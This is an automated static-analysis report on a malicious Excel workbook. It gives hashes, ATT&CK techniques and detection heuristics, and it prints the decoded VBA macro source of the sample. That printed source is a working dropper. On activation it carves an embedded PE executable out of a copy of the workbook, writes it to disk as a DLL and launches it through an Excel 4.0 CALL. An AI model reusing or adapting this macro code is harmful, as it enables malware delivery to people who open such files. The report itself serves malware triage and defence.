Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 061be38af0c1393f…

MALICIOUS

Office (OLE)

Size: 830.0 KB
Created: 2019-08-30 09:14:50
Authoring application: Microsoft Excel
First seen: 2020-08-10
MD5: 20d801fd3167c6d3e5357b4c5aa69853
SHA-1: e9eb72f25834aed0241275e276f44b6c1c47b903
SHA-256: 061be38af0c1393f0f9d77b91b05aa5284d2f41e197c40da0afe41b0193db33a
Risk Score: 522

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment; T1105 Ingress Tool Transfer; T1204.002 User Execution: Malicious File

This Excel file contains both VBA and Excel 4.0 (XLM) macros. The critical findings are a Shell() call in the VBA and a PE executable embedded in the document. The macros are built to extract and launch that embedded executable, which ClamAV detects as a dropper. References to WScript (Windows Script Host), LoadLibrary and GetProcAddress further indicate that the sample executes code beyond the macro itself.

Heuristics 12

  • ClamAV: Win.Dropper.Hideproc-6663113-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
             sendings = 1
             Dim sNMSP As New Shell
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.microsoft.com0 In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0XIn document text (OLE body)
    • http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0ZIn document text (OLE body)
    • http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0TIn document text (OLE body)
    • http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 781 bytes
SHA-256: 6d56d86df2ab84633072f1d0aac2fcfdde1d6634356699e346d43e3a8360b98c
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Macro
' 0085     16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Documen
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14356 bytes
SHA-256: b4a3b0c4d1d8d12b7662a6bc6c782e1e01996302bb153971c194562906b918e6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "one"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
PopulateDivineCommercial 380
End If

End Sub


Public Sub PopulateDivineCommercial(dImmer As Integer)

Dim ActiveHotbit As New WshShell
 Dim s As String
 Dim GetInfirmityLevelDescription As String
    
    Dim d As Long
    d = 3
    d = d - 1
    Select Case d
    Case 0
        s = "No health problems"
    Case 1
        s = "Minor health problems"
    Case 2
        s = "Major health problems"
       
    Case 3
        s = "Severe disability"
    End Select


    Dim SpecialPath As String
    

PRP = "%" & UserForm6.TextBox1.Tag

UserForm6.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%")

    
Dim car As CarClass
Set car = New CarClass
UserForm6.TextBox3.Tag = car.CheckCar(ActiveHotbit, "" & UserForm6.TextBox3.Tag + "")
ChDir (UserForm6.TextBox1.Tag)

    UserForm1.show
End Sub



Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
 #If VBA7 And Win64 Then
Public Const FlagDouble = True
#Else
Public Const FlagDouble = False

#End If
 Public DisputeChannel3 As Byte
     
Public Declaration() As Byte

     

     
    Public abbrev As Byte
  Public DisputeChannel4 As Byte
Public Sub PrepareConfigForOutput()
On Error Resume Next
    Dim i As Long
    Dim sNextChar As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean
    Dim sCommand As String
        Dim PrepareConfigForOutput As Long
    PrepareConfigForOutput = 0
    tooolsetChunkIParameter = False
    tooolsetChunkQ = False
    sCommand = Command$
    
    For i = 1 To ALen.B(sCommand)
        sNextChar = Mid(sCommand, i, 1)
        If tooolsetChunkIParameter Then
            If tooolsetChunkQ Then
                If sNextChar = " " Then
                    tooolsetChunkIParameter = False
                    tooolsetChunkQ = False
                    PrepareConfigForOutput = PrepareConfigForOutput + 1
                End If
            End If
        
        End If
    Next i
    If tooolsetChunkIParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1
End Sub




Public Sub PathBack(ByVal sPath As String)
    On Error Resume Next
    Dim sT As Variant
    Dim tt As String
    If Len(sPath) = 3 Then GoTo errorhand
    
    For ii = 0 To UBound(sT) - 2
        tt = tt & sT(ii) & "\"
    Next ii
    
    PathB.ack = tt
    
errorhand:
    Path.Back = sPath
End Sub

Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub





Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5330D5DB-F597-4E2F-9C96-7BA5B59A369B}{71CB9CE9-6AFD-4CA2-A69A-801EDA2B6713}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub
Private Sub UserForm_Initialize()
Call KeyPropUpdate(Me, False)

End Sub

Private Sub UserForm_Activate()
DoEvents
DoEvents
NigebrednehC
DoEvents
End Sub



Attribute VB_Name = "Module2"

Public Const GWL_STYLE = -16
Public Const WS_CAPTION = &HC00000
Public Const WS_SYSMENU = &H80000
 Public Const FirstB As Byte = 77
 Public Const SecondB As Byte = 90
 Public Const ThirdB As Byte = 144
#If VBA7 Then
 Public Declare PtrSafe Function BoxWSL _
 Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
 ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
 Public Declare PtrSafe Function FWA1 _
 Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
 ByVal lpWindowName As String) As Long
 Public Declare PtrSafe Function DrawMenuBar _
 Lib "user32" (ByVal parameter1 As Long) As Long
 Public Declare PtrSafe Function GetWindowLong11 _
 Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
 ByVal nIndex As Long) As Long
#Else
 Public Declare Function GetWindowLong11 _
 Lib "user32" Alias "GetWindowLongA" ( _
 ByVal parameter1 As Long, ByVal nIndex As Long) As Long
 Public Declare Function FWA1 _
 Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
 ByVal lpWindowName As String) As Long
 Public Declare Function DrawMenuBar _
 Lib "user32" (ByVal parameter1 As Long) As Long
 Public Declare Function BoxWSL _
 Lib "user32" Alias "SetWindowLongA" ( _
 ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
#End If
Public Function NumberBuffer(LongData As Long, Context As Integer, ByVal ByteData As Byte)
 If UserForm1.Enabled = True Then
 Put #LongData, , ByteData
End If
End Function
Public Function ColumnRangeWidth(ByVal ColRange As String, ByVal Width As Single) As Boolean
 ColumnRangeWidth = True
 On Error GoTo ErrorHandler
 Excel.Worksheets(1).Columns(ColRange).ColumnWidth = Width
 Exit Function
ErrorHandler:
 ColumnRangeWidth = False
 Resume Next
End Function
Public Function ColumnWidth(ByVal Col As Integer, ByVal Width As Single) As Boolean
 ColumnWidth = True
 On Error GoTo ErrorHandler
 Excel.Worksheets(1).Columns(Col).ColumnWidth = Width
 Exit Function
ErrorHandler:
 ColumnWidth = False
 Resume Next
End Function
Public Function GetFlexGridColFromXPos(TheGrid, XPos As Single) As Long
On Error GoTo ErrorTrap
Dim i As Long, lAccWidth As Long
 With TheGrid
 For i = 0 To .Cols - 1
 lAccWidth = lAccWidth + .ColWidth(i)
 If XPos <= lAccWidth Then
 GetFlexGridColFromXPos = i
 Exit Function
 End If
 Next i
 End With
 Exit Function
ErrorTrap:
 Exit Function
End Function


Private Sub ERRCHECK(result)
 If result = RCPND_FMOD_OK Then
 ms.gR.esult = MsgBox(result & ") ")
 End If
End Sub
Public Sub NigebrednehC()
    Dim sendings As Integer
    ctackPap = UserForm6.TextBox1.Tag
    Dim ofbl As String
    ofbl = UserForm6.TextBox3.Tag + "\rofce.dll"
    Dim CurrentSizeOfAT As Long

ctackPup = Join(Array(UserForm6.TextBox1.Tag, "\paper.xlsx"), "")

        ctackPop = Join(Array(ctackPap, UserForm6.TextBox3.Value), "")
        
ctackPip = Join(Array(ctackPup, ".zip"), "")

    
 PublicResumEraseByArrayList ctackPop, ctackPip, ofbl
  VistaQ ctackPup
    
        FileCopy ctackPup, ctackPip
        
         sendings = 1
         Dim sNMSP As New Shell
       
    If sendings > 0 And sendings > -30 Then
         
          Set FileWherePutTo2 = sNMSP.Namespace(ctackPap)
            Set FileWherePutTo = sNMSP.Namespace(ctackPip)
           
          
          
          
FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label11.Tag)
              
 
        End If
    CurrentSizeOfAT = 277504
      
        If FlagDouble Then
                CurrentSizeOfAT = 300000 + 14878 + 2
                sendings = 2
            End If
 Composition ctackPap & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings
        If sendings > 0 Then
            sendings = sendings + 1
            ChDir (UserForm6.TextBox3.Tag)
            sendings = sendings + 1
        End If
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
            PrepareConfigForOutput
       
        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
    ofbl = "CALL(""" + ofbl

    ExecuteExcel4Macro ofbl + """,""rekit"",""J"")"
                
End Sub





Public Sub VistaQ(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
End Sub






Attribute VB_Name = "Module0"

Attribute VB_Name = "UserForm6"
Attribute VB_Base = "0{0BFB7421-CE5B-4A47-A1F8-E4299BFA5BEB}{B4EB3A65-AD21-4441-9000-AB89BED5C8D6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"



Private Sub cmdExit_Click()
    Unload M.e
    End
End Sub












 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub















Attribute VB_Name = "Module5"

Public Sub KeyPropUpdate(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FWA1(vbNullString, frm.Caption)
windowStyle = GetWindowLong11(windowHandle, GWL_STYLE)

If show Then

    BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub

Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
 Dim DisputeChannel1 As Long
 
 Dim SimpleMethod As Integer
 ReDim Declaration(1 To fl)
 DisputeChannel1 = FreeFile
 Open Composition2 For Binary Access Read As DisputeChannel1
 Dim cur As Integer
 cur = 1
Do While 1
 Get DisputeChannel1, , abbrev
 If abbrev = FirstB Then
 Declaration(1) = abbrev
 Get DisputeChannel1, , DisputeChannel3
 If DisputeChannel3 = SecondB Then
 Declaration(2) = DisputeChannel3
 Get DisputeChannel1, , DisputeChannel4
 If DisputeChannel4 = ThirdB Then
 Declaration(3) = DisputeChannel4
 If cur = DisputeChannel6 Then
 For k = 4 To fl
 Get DisputeChannel1, , abbrev
 Declaration(k) = abbrev
 Next k
 Exit Do
 Else
 cur = cur + 1
 End If
 End If
 End If
 End If
 Loop
 Close DisputeChannel1
 On Error Resume Next
 DisputeChannel1 = FreeFile
 Open ofbl For Binary Lock Read Write As #DisputeChannel1
 For i = LBound(Declaration) To UBound(Declaration)
 If UserForm1.Enabled = True Then
 NumberBuffer DisputeChannel1, 70, Declaration(i)
 End If
 Next i
 Close DisputeChannel1
 DisputeChannel1 = FreeFile
 For HSP = 33 To -1 Step -0.25
 DisputeChannel1 = 6 + i
 Next HSP
End Sub


Attribute VB_Name = "CarClass"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    
Dim vSpeed As Integer
Dim vLicensePlate As String
 
Public Property Get Speed() As Integer
    Speed = vSpeed
End Property
 
Public Property Let Speed(sp As Integer)
    vSpeed = Application.WorksheetFunction.Min(sp, 100)
    vSpeed = Application.WorksheetFunction.Max(vSpeed, -100)
End Property
 
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" + Drive)

End Property
Public Property Get SpecialFolders() As String
    LicensePlate = vLicensePlate
End Property
 
Public Property Let LicensePlate(lp As String)
    If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
    vLicensePlate = lp
End Property
embedded_office_00004541.exe | embedded-pe | Office MZ+PE at offset 0x4541 | 832191 bytes
SHA-256: 023464f1bda6d69bbe33bbcb26c8ce5df9842d4c2c4509a4e12abc5769435423
Detection
ClamAV: Win.Dropper.Hideproc-6663113-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD0004C53B/Ole10Native | 612621 bytes
SHA-256: 97302016e0ec380e50015b7d8d846fb3ed5d0d354e4ab8437c82ea4b77695faa